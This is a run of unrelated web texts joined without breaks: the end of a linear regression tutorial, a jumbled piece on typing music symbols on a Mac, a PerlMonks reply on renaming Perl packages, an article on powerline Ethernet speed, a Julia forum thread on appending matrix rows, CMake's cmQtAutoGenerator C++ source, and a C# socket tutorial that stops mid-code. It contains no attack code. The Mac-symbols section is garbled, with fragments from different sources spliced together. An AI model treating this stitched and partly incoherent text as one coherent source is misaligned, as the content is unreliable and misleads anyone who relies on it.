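    s = (sse / (n - 2)) ** 0.5   # residual standard error
    se_b = s / sxx ** 0.5        # standard error of the slope
    return b / se_b
```

The resulting t-value is then compared against a t distribution with n − 2 degrees of freedom to obtain Pr(>|t|).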
Real Life Example
Let us consider an example where we have the class tenth and class twelfth marks of 30 students. We want to check if there is any relation between the class tenth and class twelfth marks. The scatterplot of our data looks like:
Applying Linear regression, we get the plot as:
For the above regression model, the R² value is 0.631, which is closer to 1 and indicates a moderate relationship between class tenth and class twelfth marks.
The values of MSE and RMSE are 84.132 and 9.172 respectively.
Applications of Linear Regression
Linear regression is an important tool for anticipating possible relationships between variables in various fields such as the biological, social, and behavioral sciences, where it is one of the most important concepts in use. Linear regression is also used in finance and economics: it is used to predict consumer spending, inventory investment, spending on imports, and numerous other financial statistics. It is widely used in the capital asset pricing model in finance, and it is also used in trend-line analysis, epidemiology, etc.
The applications of linear regression are ever increasing as data availability increases in every field. With more data collected in various fields, the application of regression can be extended to any data to compute the significance of various variables.
Music sign on keyboard mac
Either way, you can complete these tasks easily in a few simple steps.
Turn Your Mac Keyboard Into a GarageBand Piano
Co-authored by wikiHow Staff. Updated: March 29. Method 1.
Typing symbols in Windows 10
From the window that appears, you can search "Musical Symbols," "Musical Notes," "Notes," or any other variation in order to show the available options. Once you have found the note you would like to type, highlight it by clicking on it. Drag the symbol.
2 easy ways to find and add musical notes in MS Word
Once you have highlighted the symbol, drag it to where you would like to place it in your text. Method 2.
What's That Keyboard Character Called?
Open System Preferences. This can be done by selecting the Apple icon in the upper left-hand side of your screen or by clicking on the silver icon that resembles a cog from your task bar. Make sure "Show input menu in menu bar" is selected. These alt code Mac shortcuts will work on all default text editing apps like Pages , Numbers, Keynote, Notes, TextEdit or when typing emails. Here is the complete list of keyboard shortcuts for inserting symbols using option or alt key in macOS.
Use the search box to find or filter the results from the table. You can use one of the option keys on your keyboard to use the shortcuts. Similar to any other text content, you can increase or decrease the font size of the symbols and apply colors.
Garageband Keyboard
In our earlier article, we have explained how to type accented characters in Windows. You can use the below shortcut as a reference to insert accented characters in Mac.
Alternatively, press and hold the special letter key to view the options similar to iPhone or iPad keyboard. In order to show the options for capital letters press and hold shift with the special key.
Apple logo on foreign platforms
Mac offers different keyboard input methods to type in a language different than your standard keyboard layout. You can change the input method to Unicode Hex Input and type keyboard characters and accented letters. Similar to Windows Character Map, Mac has a Character Viewer tool to insert emojis , symbols and special characters in any text content. Many users think alt code shortcuts are useful only on Windows operating system. Some keys repeat when you press and hold them, depending on where you type them.
• In apps where accented characters aren't used like Calculator, Grapher, or Terminal , letter and number keys also repeat when you press and hold them. Use emoji on your iPhone, iPad, and iPod touch. How to use emoji, accents, and symbols on your Mac macOS includes features that make it easy to find and type special characters like emoji and currency symbols.
Type emoji and other symbols Click the place in your document or message where you want the character to appear. Press Control—Command—Space bar.
PerlMonks
Re: Change package name on the fly?
by BrowserUk (Pope)
on Sep 05, 2012 at 23:20 UTC ( #991969 )
in reply to Change package name on the fly?
You could try:
1. Slurp the source code of (one of) the packages.
2. Edit the package statement.
3. eval the edited source into existence.
Probably easier to just edit the name manually in the file until your testing is complete.
With the rise and rise of 'Social' network sites: 'Computers are making people easier to use everyday'
Examine what is said, not who speaks -- Silence betokens consent -- Love the truth but pardon error.
"Science is about questioning the status quo. Questioning authority".
In the absence of evidence, opinion is indistinguishable from prejudice.
RIP Neil Armstrong
Is powerline Ethernet slower?
Powerline Ethernet, also known as Powerline Networking or PLC (Power Line Communication), is a technology that uses the existing electrical wiring in a building to transmit network data signals. It is a popular alternative to traditional Ethernet cables or wireless networks as it offers the convenience of using electrical outlets for networking purposes.
One common concern among users considering powerline Ethernet is its potential impact on network speed. In this article, we will explore whether powerline Ethernet is slower compared to other networking methods.
How Powerline Ethernet Works
Before diving into the speed aspect, it is essential to understand how powerline Ethernet works. Powerline Ethernet adapters typically come in pairs – one adapter connects to your router via an Ethernet cable, while the other adapter plugs into an electrical outlet in another part of your home or office.
Once connected, the adapters communicate with each other using electrical signals that traverse the existing electrical wiring. This allows the transmission of data signals between the two adapters, effectively extending the network connection to the desired location.
Factors Affecting Powerline Ethernet Speed
Several factors can impact the speed of a powerline Ethernet network. It is essential to consider these factors when evaluating the performance and speed capabilities of this networking solution.
Electrical Wiring Quality:
The quality, age, and condition of your electrical wiring can affect the performance of powerline Ethernet. Older or poorly maintained electrical wiring may introduce interference, reducing the speed and reliability of the network connection. On the other hand, newer and well-maintained wiring can provide better performance.
Distance and Electrical Circuits:
Powerline Ethernet performance may vary depending on the distance between the adapters and the complexity of electrical circuits. The signal strength tends to weaken over longer distances and may suffer additional degradation when passing through circuit breakers or surge protectors.
Interference:
Other electrical devices connected to the same electrical circuit can introduce interference that affects powerline Ethernet speed. Devices such as refrigerators, microwave ovens, or power tools can generate electrical noise that interferes with the data signal, resulting in slower speeds.
Comparing Speeds: Powerline Ethernet vs. Other Methods
When compared to traditional Ethernet cables or Wi-Fi networks, powerline Ethernet is generally considered to have slower speeds. Ethernet cables, especially Cat5e or Cat6 cables, offer faster and more reliable connections since they provide dedicated, point-to-point connections between devices.
Wi-Fi networks, although convenient for wireless access, may experience signal degradation and lower speeds due to distance, obstacles, or interference from other devices operating on the same frequency band.
While powerline Ethernet may not offer the same speed as Ethernet cables, it provides an alternative for situations where running cables is not feasible or desirable. The actual speed you can achieve with powerline Ethernet depends on the factors mentioned above, but it can still deliver satisfactory performance for most everyday internet tasks.
While powerline Ethernet may be slower compared to traditional Ethernet cables, it offers a convenient solution for extending network connectivity using existing electrical wiring. Factors such as electrical wiring quality, distance, and interference can affect its speed. However, for most typical internet activities, powerline Ethernet provides sufficient performance without the need for extensive cable installations or signal degradation commonly associated with Wi-Fi networks.
In conclusion, powerline Ethernet can be an efficient and viable option for creating a reliable and convenient network connection in situations where running Ethernet cables is not feasible or desired.
Adding rows to a matrix dynamically
I am trying to initialize a matrix of Float64 and then add rows to it dynamically in a loop. I tried push! and append! but was not able to find the right way to do it. I am currently using a not-so-efficient method where each column of the matrix is constructed as a vector using push!, and then I make a matrix out of those vectors using hcat.
You likely want to build up your matrix column by column instead of row by row, since Julia uses column major storage, as opposed to numpy, for example, which uses a row major layout. This will make appending rows to a matrix inefficient, since a lot of entries will have to be moved around, unless you preallocate a larger array and introduce a greater stride along the first axis. Here is one way to append columns to a matrix without allocating temporary matrices:
julia> cat!(a, b) = reshape(append!(vec(a), vec(b)), size(a)[1:end-1]..., :)
cat! (generic function with 1 method)
julia> cat!([1 2; 3 4], [1, 2])
2×3 Array{Int64,2}:
1 2 1
3 4 2
2 Likes
Thanks @simeonschaub .
I will try your suggestion!
If the size of the vectors is known in advance and not too large, you can also build your data as a vector of static vectors, and then view it as a matrix:
using StaticArrays
vecs = SVector{3,Int}[]
for i in 1:5
push!(vecs, SVector(1,2,3))
end
m = reshape(reinterpret(Int,vecs),3,:)
3×5 reshape(reinterpret(Int64, ::Array{SArray{Tuple{3},Int64,1,3},1}), 3, 5) with eltype Int64:
1 1 1 1 1
2 2 2 2 2
3 3 3 3 3
2 Likes
Thanks @yha!
size of the arrays is unknown & it varies from case to case.
I tried with the following code but getting errors
function test(N::Int64)
oa = Matrix{Float64}(undef, 0, 2)
for _ = 1:N
if some_condition == true
append!(oa, rand(1, 2))
end
end
return oa
end
ERROR: MethodError: no method matching append!(::Array{Float64,2}, ::Array{Float64,2})
Closest candidates are:
append!(::BitArray{1}, ::Any) at bitarray.jl:771
append!(::AbstractArray{T,1} where T, ::Any) at array.jl:981
append!(::DataStructures.MutableLinkedList, ::Any...) at ~/.julia/packages/DataStructures/5hvIb/src/mutable_list.jl:160
Thanks!
blob: 734b2d70d88bec06197ce9543c77c08ac43d1097
/* Distributed under the OSI-approved BSD 3-Clause License. See accompanying
file Copyright.txt or https://cmake.org/licensing for details. */
#include "cmQtAutoGenerator.h"
#include "cmQtAutoGen.h"
#include "cmsys/FStream.hxx"
#include "cmAlgorithms.h"
#include "cmGlobalGenerator.h"
#include "cmMakefile.h"
#include "cmStateDirectory.h"
#include "cmStateSnapshot.h"
#include "cmSystemTools.h"
#include "cmake.h"
#include <algorithm>
// -- Class methods
void cmQtAutoGenerator::Logger::RaiseVerbosity(std::string const& value)
{
unsigned long verbosity = 0;
if (cmSystemTools::StringToULong(value.c_str(), &verbosity)) {
if (this->Verbosity_ < verbosity) {
this->Verbosity_ = static_cast<unsigned int>(verbosity);
}
}
}
void cmQtAutoGenerator::Logger::SetColorOutput(bool value)
{
ColorOutput_ = value;
}
std::string cmQtAutoGenerator::Logger::HeadLine(std::string const& title)
{
std::string head = title;
head += '\n';
head.append(head.size() - 1, '-');
head += '\n';
return head;
}
void cmQtAutoGenerator::Logger::Info(GeneratorT genType,
std::string const& message)
{
std::string msg = GeneratorName(genType);
msg += ": ";
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stdout(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::Warning(GeneratorT genType,
std::string const& message)
{
std::string msg;
if (message.find('\n') == std::string::npos) {
// Single line message
msg += GeneratorName(genType);
msg += " warning: ";
} else {
// Multi line message
msg += HeadLine(GeneratorName(genType) + " warning");
}
// Message
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stdout(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::WarningFile(GeneratorT genType,
std::string const& filename,
std::string const& message)
{
std::string msg = " ";
msg += Quoted(filename);
msg.push_back('\n');
// Message
msg += message;
Warning(genType, msg);
}
void cmQtAutoGenerator::Logger::Error(GeneratorT genType,
std::string const& message)
{
std::string msg;
msg += HeadLine(GeneratorName(genType) + " error");
// Message
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stderr(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::ErrorFile(GeneratorT genType,
std::string const& filename,
std::string const& message)
{
std::string emsg = " ";
emsg += Quoted(filename);
emsg += '\n';
// Message
emsg += message;
Error(genType, emsg);
}
void cmQtAutoGenerator::Logger::ErrorCommand(
GeneratorT genType, std::string const& message,
std::vector<std::string> const& command, std::string const& output)
{
std::string msg;
msg.push_back('\n');
msg += HeadLine(GeneratorName(genType) + " subprocess error");
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
msg += HeadLine("Command");
msg += QuotedCommand(command);
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
msg += HeadLine("Output");
msg += output;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stderr(msg.c_str(), msg.size());
}
}
std::string cmQtAutoGenerator::FileSystem::GetRealPath(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::GetRealPath(filename);
}
std::string cmQtAutoGenerator::FileSystem::CollapseCombinedPath(
std::string const& dir, std::string const& file)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::CollapseCombinedPath(dir, file);
}
void cmQtAutoGenerator::FileSystem::SplitPath(
const std::string& p, std::vector<std::string>& components,
bool expand_home_dir)
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::SplitPath(p, components, expand_home_dir);
}
std::string cmQtAutoGenerator::FileSystem::JoinPath(
const std::vector<std::string>& components)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::JoinPath(components);
}
std::string cmQtAutoGenerator::FileSystem::JoinPath(
std::vector<std::string>::const_iterator first,
std::vector<std::string>::const_iterator last)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::JoinPath(first, last);
}
std::string cmQtAutoGenerator::FileSystem::GetFilenameWithoutLastExtension(
const std::string& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::GetFilenameWithoutLastExtension(filename);
}
std::string cmQtAutoGenerator::FileSystem::SubDirPrefix(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmQtAutoGen::SubDirPrefix(filename);
}
void cmQtAutoGenerator::FileSystem::setupFilePathChecksum(
std::string const& currentSrcDir, std::string const& currentBinDir,
std::string const& projectSrcDir, std::string const& projectBinDir)
{
std::lock_guard<std::mutex> lock(Mutex_);
FilePathChecksum_.setupParentDirs(currentSrcDir, currentBinDir,
projectSrcDir, projectBinDir);
}
std::string cmQtAutoGenerator::FileSystem::GetFilePathChecksum(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return FilePathChecksum_.getPart(filename);
}
bool cmQtAutoGenerator::FileSystem::FileExists(std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileExists(filename);
}
bool cmQtAutoGenerator::FileSystem::FileExists(std::string const& filename,
bool isFile)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileExists(filename, isFile);
}
unsigned long cmQtAutoGenerator::FileSystem::FileLength(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileLength(filename);
}
bool cmQtAutoGenerator::FileSystem::FileIsOlderThan(
std::string const& buildFile, std::string const& sourceFile,
std::string* error)
{
bool res(false);
int result = 0;
{
std::lock_guard<std::mutex> lock(Mutex_);
res = cmSystemTools::FileTimeCompare(buildFile, sourceFile, &result);
}
if (res) {
res = (result < 0);
} else {
if (error != nullptr) {
error->append(
"File modification time comparison failed for the files\n ");
error->append(Quoted(buildFile));
error->append("\nand\n ");
error->append(Quoted(sourceFile));
}
}
return res;
}
bool cmQtAutoGenerator::FileSystem::FileRead(std::string& content,
std::string const& filename,
std::string* error)
{
bool success = false;
if (FileExists(filename, true)) {
unsigned long const length = FileLength(filename);
{
std::lock_guard<std::mutex> lock(Mutex_);
cmsys::ifstream ifs(filename.c_str(), (std::ios::in | std::ios::binary));
if (ifs) {
content.reserve(length);
content.assign(std::istreambuf_iterator<char>{ ifs },
std::istreambuf_iterator<char>{});
if (ifs) {
success = true;
} else {
content.clear();
if (error != nullptr) {
error->append("Reading from the file failed.");
}
}
} else if (error != nullptr) {
error->append("Opening the file for reading failed.");
}
}
} else if (error != nullptr) {
error->append(
"The file does not exist, is not readable or is a directory.");
}
return success;
}
bool cmQtAutoGenerator::FileSystem::FileRead(GeneratorT genType,
std::string& content,
std::string const& filename)
{
std::string error;
if (!FileRead(content, filename, &error)) {
Log()->ErrorFile(genType, filename, error);
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::FileWrite(std::string const& filename,
std::string const& content,
std::string* error)
{
bool success = false;
// Make sure the parent directory exists
if (MakeParentDirectory(filename)) {
std::lock_guard<std::mutex> lock(Mutex_);
cmsys::ofstream outfile;
outfile.open(filename.c_str(),
(std::ios::out | std::ios::binary | std::ios::trunc));
if (outfile) {
outfile << content;
// Check for write errors
if (outfile.good()) {
success = true;
} else {
if (error != nullptr) {
error->assign("File writing failed");
}
}
} else {
if (error != nullptr) {
error->assign("Opening file for writing failed");
}
}
} else {
if (error != nullptr) {
error->assign("Could not create parent directory");
}
}
return success;
}
bool cmQtAutoGenerator::FileSystem::FileWrite(GeneratorT genType,
std::string const& filename,
std::string const& content)
{
std::string error;
if (!FileWrite(filename, content, &error)) {
Log()->ErrorFile(genType, filename, error);
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::FileDiffers(std::string const& filename,
std::string const& content)
{
bool differs = true;
{
std::string oldContents;
if (FileRead(oldContents, filename)) {
differs = (oldContents != content);
}
}
return differs;
}
bool cmQtAutoGenerator::FileSystem::FileRemove(std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::RemoveFile(filename);
}
bool cmQtAutoGenerator::FileSystem::Touch(std::string const& filename,
bool create)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::Touch(filename, create);
}
bool cmQtAutoGenerator::FileSystem::MakeDirectory(std::string const& dirname)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::MakeDirectory(dirname);
}
bool cmQtAutoGenerator::FileSystem::MakeDirectory(GeneratorT genType,
std::string const& dirname)
{
if (!MakeDirectory(dirname)) {
Log()->ErrorFile(genType, dirname, "Could not create directory");
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::MakeParentDirectory(
std::string const& filename)
{
bool success = true;
std::string const dirName = cmSystemTools::GetFilenamePath(filename);
if (!dirName.empty()) {
success = MakeDirectory(dirName);
}
return success;
}
bool cmQtAutoGenerator::FileSystem::MakeParentDirectory(
GeneratorT genType, std::string const& filename)
{
if (!MakeParentDirectory(filename)) {
Log()->ErrorFile(genType, filename, "Could not create parent directory");
return false;
}
return true;
}
int cmQtAutoGenerator::ReadOnlyProcessT::PipeT::init(uv_loop_t* uv_loop,
ReadOnlyProcessT* process)
{
Process_ = process;
Target_ = nullptr;
return UVPipe_.init(*uv_loop, 0, this);
}
int cmQtAutoGenerator::ReadOnlyProcessT::PipeT::startRead(std::string* target)
{
Target_ = target;
return uv_read_start(uv_stream(), &PipeT::UVAlloc, &PipeT::UVData);
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::reset()
{
Process_ = nullptr;
Target_ = nullptr;
UVPipe_.reset();
Buffer_.clear();
Buffer_.shrink_to_fit();
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::UVAlloc(uv_handle_t* handle,
size_t suggestedSize,
uv_buf_t* buf)
{
auto& pipe = *reinterpret_cast<PipeT*>(handle->data);
pipe.Buffer_.resize(suggestedSize);
buf->base = &pipe.Buffer_.front();
buf->len = pipe.Buffer_.size();
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::UVData(uv_stream_t* stream,
ssize_t nread,
const uv_buf_t* buf)
{
auto& pipe = *reinterpret_cast<PipeT*>(stream->data);
if (nread > 0) {
// Append data to merged output
if ((buf->base != nullptr) && (pipe.Target_ != nullptr)) {
pipe.Target_->append(buf->base, nread);
}
} else if (nread < 0) {
// EOF or error
auto* proc = pipe.Process_;
    // Check if this is an unusual error
if (nread != UV_EOF) {
if (!proc->Result()->error()) {
proc->Result()->ErrorMessage =
"libuv reading from pipe failed with error code ";
proc->Result()->ErrorMessage += std::to_string(nread);
}
}
// Clear libuv pipe handle and try to finish
pipe.reset();
proc->UVTryFinish();
}
}
void cmQtAutoGenerator::ProcessResultT::reset()
{
ExitStatus = 0;
TermSignal = 0;
if (!StdOut.empty()) {
StdOut.clear();
StdOut.shrink_to_fit();
}
if (!StdErr.empty()) {
StdErr.clear();
StdErr.shrink_to_fit();
}
if (!ErrorMessage.empty()) {
ErrorMessage.clear();
ErrorMessage.shrink_to_fit();
}
}
void cmQtAutoGenerator::ReadOnlyProcessT::setup(
ProcessResultT* result, bool mergedOutput,
std::vector<std::string> const& command, std::string const& workingDirectory)
{
Setup_.WorkingDirectory = workingDirectory;
Setup_.Command = command;
Setup_.Result = result;
Setup_.MergedOutput = mergedOutput;
}
bool cmQtAutoGenerator::ReadOnlyProcessT::start(
uv_loop_t* uv_loop, std::function<void()>&& finishedCallback)
{
if (IsStarted() || (Result() == nullptr)) {
return false;
}
// Reset result before the start
Result()->reset();
// Fill command string pointers
if (!Setup().Command.empty()) {
CommandPtr_.reserve(Setup().Command.size() + 1);
for (std::string const& arg : Setup().Command) {
CommandPtr_.push_back(arg.c_str());
}
CommandPtr_.push_back(nullptr);
} else {
Result()->ErrorMessage = "Empty command";
}
if (!Result()->error()) {
if (UVPipeOut_.init(uv_loop, this) != 0) {
Result()->ErrorMessage = "libuv stdout pipe initialization failed";
}
}
if (!Result()->error()) {
if (UVPipeErr_.init(uv_loop, this) != 0) {
Result()->ErrorMessage = "libuv stderr pipe initialization failed";
}
}
if (!Result()->error()) {
// -- Setup process stdio options
// stdin
UVOptionsStdIO_[0].flags = UV_IGNORE;
UVOptionsStdIO_[0].data.stream = nullptr;
// stdout
UVOptionsStdIO_[1].flags =
static_cast<uv_stdio_flags>(UV_CREATE_PIPE | UV_WRITABLE_PIPE);
UVOptionsStdIO_[1].data.stream = UVPipeOut_.uv_stream();
// stderr
UVOptionsStdIO_[2].flags =
static_cast<uv_stdio_flags>(UV_CREATE_PIPE | UV_WRITABLE_PIPE);
UVOptionsStdIO_[2].data.stream = UVPipeErr_.uv_stream();
// -- Setup process options
std::fill_n(reinterpret_cast<char*>(&UVOptions_), sizeof(UVOptions_), 0);
UVOptions_.exit_cb = &ReadOnlyProcessT::UVExit;
UVOptions_.file = CommandPtr_[0];
UVOptions_.args = const_cast<char**>(&CommandPtr_.front());
UVOptions_.cwd = Setup_.WorkingDirectory.c_str();
UVOptions_.flags = UV_PROCESS_WINDOWS_HIDE;
UVOptions_.stdio_count = static_cast<int>(UVOptionsStdIO_.size());
UVOptions_.stdio = &UVOptionsStdIO_.front();
// -- Spawn process
if (UVProcess_.spawn(*uv_loop, UVOptions_, this) != 0) {
Result()->ErrorMessage = "libuv process spawn failed";
}
}
// -- Start reading from stdio streams
if (!Result()->error()) {
if (UVPipeOut_.startRead(&Result()->StdOut) != 0) {
Result()->ErrorMessage = "libuv start reading from stdout pipe failed";
}
}
if (!Result()->error()) {
if (UVPipeErr_.startRead(Setup_.MergedOutput ? &Result()->StdOut
: &Result()->StdErr) != 0) {
Result()->ErrorMessage = "libuv start reading from stderr pipe failed";
}
}
if (!Result()->error()) {
IsStarted_ = true;
FinishedCallback_ = std::move(finishedCallback);
} else {
// Clear libuv handles and finish
UVProcess_.reset();
UVPipeOut_.reset();
UVPipeErr_.reset();
CommandPtr_.clear();
}
return IsStarted();
}
void cmQtAutoGenerator::ReadOnlyProcessT::UVExit(uv_process_t* handle,
int64_t exitStatus,
int termSignal)
{
auto& proc = *reinterpret_cast<ReadOnlyProcessT*>(handle->data);
if (proc.IsStarted() && !proc.IsFinished()) {
// Set error message on demand
proc.Result()->ExitStatus = exitStatus;
proc.Result()->TermSignal = termSignal;
if (!proc.Result()->error()) {
if (termSignal != 0) {
proc.Result()->ErrorMessage = "Process was terminated by signal ";
proc.Result()->ErrorMessage +=
std::to_string(proc.Result()->TermSignal);
} else if (exitStatus != 0) {
proc.Result()->ErrorMessage = "Process failed with return value ";
proc.Result()->ErrorMessage +=
std::to_string(proc.Result()->ExitStatus);
}
}
// Reset process handle and try to finish
proc.UVProcess_.reset();
proc.UVTryFinish();
}
}
void cmQtAutoGenerator::ReadOnlyProcessT::UVTryFinish()
{
// There still might be data in the pipes after the process has finished.
// Therefore check if the process is finished AND all pipes are closed
// before signaling the worker thread to continue.
if (UVProcess_.get() == nullptr) {
if (UVPipeOut_.uv_pipe() == nullptr) {
if (UVPipeErr_.uv_pipe() == nullptr) {
IsFinished_ = true;
FinishedCallback_();
}
}
}
}
cmQtAutoGenerator::cmQtAutoGenerator()
: FileSys_(&Logger_)
{
// Initialize logger
{
std::string verbose;
if (cmSystemTools::GetEnv("VERBOSE", verbose) && !verbose.empty()) {
unsigned long iVerbose = 0;
if (cmSystemTools::StringToULong(verbose.c_str(), &iVerbose)) {
Logger_.SetVerbosity(static_cast<unsigned int>(iVerbose));
} else {
// Non numeric verbosity
Logger_.SetVerbose(cmSystemTools::IsOn(verbose));
}
}
}
{
std::string colorEnv;
cmSystemTools::GetEnv("COLOR", colorEnv);
if (!colorEnv.empty()) {
Logger_.SetColorOutput(cmSystemTools::IsOn(colorEnv));
} else {
Logger_.SetColorOutput(true);
}
}
// Initialize libuv loop
uv_disable_stdio_inheritance();
#ifdef CMAKE_UV_SIGNAL_HACK
UVHackRAII_ = cm::make_unique<cmUVSignalHackRAII>();
#endif
UVLoop_ = cm::make_unique<uv_loop_t>();
uv_loop_init(UVLoop());
}
cmQtAutoGenerator::~cmQtAutoGenerator()
{
// Close libuv loop
uv_loop_close(UVLoop());
}
bool cmQtAutoGenerator::Run(std::string const& infoFile,
std::string const& config)
{
// Info settings
InfoFile_ = infoFile;
cmSystemTools::ConvertToUnixSlashes(InfoFile_);
InfoDir_ = cmSystemTools::GetFilenamePath(infoFile);
InfoConfig_ = config;
bool success = false;
{
cmake cm(cmake::RoleScript);
cm.SetHomeOutputDirectory(InfoDir());
cm.SetHomeDirectory(InfoDir());
cm.GetCurrentSnapshot().SetDefaultDefinitions();
cmGlobalGenerator gg(&cm);
cmStateSnapshot snapshot = cm.GetCurrentSnapshot();
snapshot.GetDirectory().SetCurrentBinary(InfoDir());
snapshot.GetDirectory().SetCurrentSource(InfoDir());
auto makefile = cm::make_unique<cmMakefile>(&gg, snapshot);
// The OLD/WARN behavior for policy CMP0053 caused a speed regression.
// https://gitlab.kitware.com/cmake/cmake/issues/17570
makefile->SetPolicyVersion("3.9", std::string());
gg.SetCurrentMakefile(makefile.get());
success = this->Init(makefile.get());
}
if (success) {
success = this->Process();
}
return success;
}
std::string cmQtAutoGenerator::SettingsFind(std::string const& content,
const char* key)
{
std::string prefix(key);
prefix += ':';
std::string::size_type pos = content.find(prefix);
if (pos != std::string::npos) {
pos += prefix.size();
if (pos < content.size()) {
std::string::size_type posE = content.find('\n', pos);
if ((posE != std::string::npos) && (posE != pos)) {
return content.substr(pos, posE - pos);
}
}
}
return std::string();
}
An Introduction to Socket Programming in .NET using C#
10 Jun 2005
Introduction
In this article, we will learn the basics of socket programming in .NET Framework using C#. Secondly, we will create a small application consisting of a server and a client, which will communicate using TCP and UDP protocols.
Pre-requisites
• Must be familiar with .NET Framework.
• Should have good knowledge of C#.
• Basic knowledge of socket programming.
1.1 Networking basics:
Inter-Process Communication, i.e. the capability of two or more physically connected machines to exchange data, plays a very important role in enterprise software development. TCP/IP is the most common standard adopted for such communication. Under TCP/IP, each machine is identified by a unique 4 byte integer referred to as its IP address (usually written in dotted form, e.g. 192.168.0.101). For easy remembrance, this IP address is usually bound to a user-friendly host name. The program below (showip.cs) uses the System.Net.Dns class to display the IP address of the machine whose name is passed in the first command-line argument. In the absence of command-line arguments, it displays the name and IP address of the local machine.
using System;
using System.Net;
class ShowIP{
public static void Main(string[] args){
string name = (args.Length < 1) ? Dns.GetHostName() : args[0];
try{
IPAddress[] addrs = Dns.Resolve(name).AddressList;
foreach(IPAddress addr in addrs)
Console.WriteLine("{0}/{1}",name,addr);
}catch(Exception e){
Console.WriteLine(e.Message);
}
}
}
Dns.GetHostName() returns the name of the local machine and Dns.Resolve() returns IPHostEntry for a machine with a given name, the AddressList property of which returns the IPAdresses of the machine. The Resolve method will cause an exception if the mentioned host is not found.
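Note that Dns.Resolve was marked obsolete in later versions of the .NET Framework; Dns.GetHostEntry performs the same lookup. A minimal sketch (the class name HostInfoDemo is made up for this illustration):

```csharp
using System;
using System.Net;
using System.Net.Sockets;

class HostInfoDemo {
    public static void Main() {
        // GetHostName() returns the local machine name without a DNS lookup
        string name = Dns.GetHostName();
        Console.WriteLine(name);
        try {
            // GetHostEntry() performs the DNS lookup and throws a
            // SocketException when the host cannot be resolved
            IPHostEntry entry = Dns.GetHostEntry(name);
            foreach (IPAddress addr in entry.AddressList)
                Console.WriteLine(addr);
        } catch (SocketException e) {
            Console.WriteLine(e.Message);
        }
    }
}
```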
Though an IP address allows us to identify machines on the network, each machine may host multiple applications that use the network for data exchange. Under TCP/IP, each network-oriented application binds itself to a unique 2 byte integer referred to as its port-number, which identifies that application on the machine on which it is executing. The data transfer takes place in the form of byte bundles called IP Packets or Datagrams. The maximum size of each datagram is 64 KB, and it contains the data to be transferred, the actual size of the data, and the IP addresses and port-numbers of the sender and the prospective receiver. Once a datagram is placed on a network by a machine, it will be received physically by all the other machines but will be accepted only by the machine whose IP address matches the receiver’s IP address in the packet. That machine will then transfer the packet to the application running on it which is bound to the receiver’s port-number present in the packet.
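The framework models the address/port pair directly with System.Net.IPEndPoint. A small illustration (the class name EndPointDemo is hypothetical):

```csharp
using System;
using System.Net;

class EndPointDemo {
    public static void Main() {
        // An endpoint is an IP address plus a port number; together
        // they identify one application on one machine.
        IPAddress addr = IPAddress.Parse("192.168.0.101");
        IPEndPoint ep = new IPEndPoint(addr, 2055);
        Console.WriteLine(ep);      // prints 192.168.0.101:2055
        Console.WriteLine(ep.Port); // prints 2055
    }
}
```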
The TCP/IP suite actually offers two different protocols for data exchange: the Transmission Control Protocol (TCP) is a reliable connection-oriented protocol, while the User Datagram Protocol (UDP) is a fast but less reliable connectionless protocol.
1.2 Client-Server programming with TCP/IP:
Under TCP there is a clear distinction between the server process and the client process. The server process starts on a well known port (which the clients are aware of) and listens for incoming connection requests. The client process starts on any port and issues a connection request.
The basic steps to create a TCP/IP server are as follows:
1. Create a System.Net.Sockets.TcpListener with a given local port and start it:
TcpListener listener = new TcpListener(local_port);
listener.Start();
2. Wait for the incoming connection request and accept a System.Net.Sockets.Socket object from the listener whenever the request appears:
Socket soc = listener.AcceptSocket(); // blocks
3. Create a System.Net.Sockets.NetworkStream from the above Socket:
Stream s = new NetworkStream(soc);
4. Communicate with the client using the predefined protocol (well established rules for data exchange):
5. Close the Stream:
s.Close();
6. Close the Socket:
soc.Close();
7. Go to Step 2.
Note that once a request is accepted in step 2, no other request will be accepted until the code reaches step 7 (pending requests are placed in a queue, or backlog). In order to accept and service more than one client concurrently, steps 2 – 7 must be executed in multiple threads. The program below (emptcpserver.cs) is a multithreaded TCP/IP server which accepts an employee name from its client and sends back the job of the employee. The client terminates the session by sending a blank line for the employee’s name. The employee data is retrieved from the application’s configuration file (an XML file in the directory of the application whose name is the name of the application with a .config extension).
using System;
using System.Threading;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Configuration;
class EmployeeTCPServer{
static TcpListener listener;
const int LIMIT = 5; //5 concurrent clients
